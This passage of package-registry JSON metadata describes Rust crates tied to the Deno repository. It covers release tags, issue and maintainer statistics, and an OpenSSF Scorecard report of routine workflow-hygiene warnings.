gs/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T04:46:32.908Z","dependent_packages_count":0,"downloads":589,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.5209992393904,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.55781091062379},"purl":"pkg:cargo/pacstall-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacstall-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacstall-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacstall-rs/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:39.376Z","updated_at":"2023-01-11T08:26:39.376Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14107009,"name":"deno_npmrc","ecosystem":"cargo","description":"npm registry configuration (.npmrc) parser","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":19,"first_release_published_at":"2026-03-23T15:44:00.139Z","latest_release_published_at":"2026-08-27T15:20:42.838Z","latest_release_number":"0.19.0","last_synced_at":"2026-09-07T23:00:18.232Z","created_at":"2026-03-23T15:48:21.505Z","updated_at":"2026-09-08T04:55:28.089Z","registry_url":"https://crates.io/crates/deno_npmrc/","install_command":"cargo install deno_npmrc","documentation_url":"https://docs.rs/deno_npmrc/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using 